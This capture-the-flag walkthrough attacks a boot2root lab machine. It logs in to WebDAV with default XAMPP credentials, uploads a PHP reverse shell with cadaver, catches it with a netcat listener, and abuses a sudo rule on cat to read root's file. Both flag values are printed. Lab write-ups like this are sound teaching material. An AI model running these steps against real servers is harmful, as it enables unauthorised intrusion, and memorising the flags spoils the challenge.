From aldeid
Jump to navigation Jump to search


boot2root machine for FIT and bsides guatemala CTF

Read user.txt and root.txt

#1 - user.txt


Nmap reveals only 1 open port, HTTP, on standard port 80.

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Web enumeration

There is no robots.txt file that may have disclosed hidden locations, but dirsearch found a /webdav/ directory, which requires an authentication.

Searching for the terms default credentials webdav on Google leads to this link that applies to XAMPP, but why not giving it a try?

Guess what? It worked with wampp:xampp!


Now authenticated, we are able to list the files on the webdav server, and there is only 1 file, which was the authentication file:

$ wget --http-user="wampp" --http-password="xampp"
$ cat passwd.dav 

Now that we have access, let’s confirm if the server allows us to put files:

$ curl -u "wampp:xampp" -X PUT

The file test is successfully uploaded to the server.

Reverse shell

Let’s use cadaver to upload a PHP reverse shell:

$ cadaver
Authentication required for webdav on server `':
Username: wampp
dav:/webdav/> put shell.php
Uploading shell.php to `/webdav/shell.php':
Progress: [=============================>] 100.0% of 5491 bytes succeeded.
dav:/webdav/> quit
Connection to `' closed.

Now, open a listener on our machine:

$ rlwrap nc -nlvp 4444

Open the URL where you have uploaded the PHP shell (e.g. and voila, you have a reverse shell.

$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( )
Ncat: Listening on :::4444
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
Linux ubuntu 4.4.0-159-generic #187-Ubuntu SMP Thu Aug 1 16:28:06 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 13:47:48 up  1:56,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             [email protected]   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

User flag

Now, let’s upgrade our shell and get the flag:

$ SHELL=/bin/bash script -q /dev/null
[email protected]:/$ cd /home
[email protected]:/home$ ls
merlin  wampp
[email protected]:/home/wampp$ cd /home/merlin/
[email protected]:/home/merlin$ ls -la
total 44
drwxr-xr-x 4 merlin merlin 4096 Aug 25  2019 .
drwxr-xr-x 4 root   root   4096 Aug 25  2019 ..
-rw------- 1 merlin merlin 2377 Aug 25  2019 .bash_history
-rw-r--r-- 1 merlin merlin  220 Aug 25  2019 .bash_logout
-rw-r--r-- 1 merlin merlin 3771 Aug 25  2019 .bashrc
drwx------ 2 merlin merlin 4096 Aug 25  2019 .cache
-rw------- 1 merlin merlin   68 Aug 25  2019 .lesshst
drwxrwxr-x 2 merlin merlin 4096 Aug 25  2019 .nano
-rw-r--r-- 1 merlin merlin  655 Aug 25  2019 .profile
-rw-r--r-- 1 merlin merlin    0 Aug 25  2019 .sudo_as_admin_successful
-rw-r--r-- 1 root   root    183 Aug 25  2019 .wget-hsts
-rw-rw-r-- 1 merlin merlin   33 Aug 25  2019 user.txt
[email protected]:/home/merlin$ cat user.txt

User flag: 449b40fe93f78a938523b7e4dcd66d2a

#2 - root.txt

Checking our privileges with sudo -l reveals that we can cat any file with sudo without password. Let’s get the root flag:

[email protected]:/home/merlin$ sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,

User www-data may run the following commands on ubuntu:
    (ALL) NOPASSWD: /bin/cat
[email protected]:/home/merlin$ sudo cat /root/root.txt

Root flag: 101101ddc16b0cdf65ba0b8a7af7afa5